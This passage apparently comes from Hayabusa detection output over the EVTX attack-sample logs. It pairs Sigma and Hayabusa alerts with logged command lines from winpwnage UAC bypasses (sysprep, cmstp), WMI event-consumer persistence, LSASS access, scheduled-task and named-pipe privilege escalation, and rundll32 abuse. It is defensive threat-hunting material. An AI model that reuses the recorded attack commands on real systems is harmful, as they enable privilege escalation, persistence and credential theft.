365ABB72-FE34-5CD6-0000-0010EB2E1700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.821 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:18.069 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer: | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 
02:10:10.889 +09:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,../hayabusa-rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:28:17.176 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:17.363 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via 
CMSTP,,../hayabusa-rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,../hayabusa-rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:57:49.903 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:22.809 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 
365ABB72-0D3E-5CD7-0000-0010680E1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.215 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.340 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.418 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.450 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: 
IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.590 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:39.746 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:50.090 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 
365ABB72-0D5A-5CD7-0000-001069031700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.887 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE | Process: 
C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 2432 | PGUID: 365ABB72-0D5E-5CD7-0000-0010A1141700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.903 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.981 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",../hayabusa-rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.028 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 4084 | PGUID: 365ABB72-0D5E-5CD7-0000-0010E6241700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.090 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: 
""__EventFilter.Name=\""BotFilter82\""""",../hayabusa-rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.153 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3016 | PGUID: 365ABB72-0D5E-5CD7-0000-001047331700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 03:10:42.434 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 744 | PGUID: 365ABB72-1022-5CD7-0000-00105D081C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.637 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x101ffb | Src PID: 744 | Src PGUID: 365ABB72-1022-5CD7-0000-00105D081C00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: 
C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0x3e7 | PID: 3248 | PGUID: 365ABB72-1022-5CD7-0000-0010DF121C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 09:32:24.461 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x1384a | PID: 2740 | PGUID: 365ABB72-6998-5CD7-0000-00104E422200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3876 | PGUID: 365ABB72-699E-5CD7-0000-001073582200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Task From User AppData Temp,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicius Schtasks From Env Var Folder,,../hayabusa-rules/sigma/process_creation/win_pc_susp_schtasks_env_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Exec,Suspicious Add Scheduled Command Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtasks_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.227 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\elevator | Process: C:\Windows\system32\svchost.exe | PID: 972 | PGUID: 365ABB72-5DEA-5CD7-0000-001077D20000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.258 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3752 | PGUID: 365ABB72-69A3-5CD7-0000-0010306F2200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.352 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe 
{9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1860 | PGUID: 365ABB72-69A3-5CD7-0000-00109D7F2200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:40.342 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe | LID: 0x1384a | PID: 3792 | PGUID: 365ABB72-69A8-5CD7-0000-0010C0982200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 21:52:43.702 +09:00,IEWIN7,7045,info,Persis,Service Installed,Name: WinPwnage | Path: %COMSPEC% /c ping -n 1 127.0.0.1 >nul && echo 'WinPwnage' > \\.\pipe\WinPwnagePipe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/System_7045_namedpipe_privesc.evtx +2019-05-12 22:30:32.931 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x13a10 | PID: 1332 | PGUID: 365ABB72-1FF8-5CD8-0000-00102A342000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.181 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\ieframe.url | Process: c:\python27\python.exe | PID: 1332 | PGUID: 
365ABB72-1FF8-5CD8-0000-00102A342000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe | LID: 0x13a10 | PID: 2960 | PGUID: 365ABB72-2006-5CD8-0000-0010A2862300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.556 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url | LID: 0x13a10 | PID: 2936 | PGUID: 365ABB72-2006-5CD8-0000-0010E0912300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 3560 | PGUID: 
365ABB72-208A-5CD8-0000-0010119B2400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1844 | PGUID: 365ABB72-20B1-5CD8-0000-001064D62400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13a10 | PID: 1416 | PGUID: 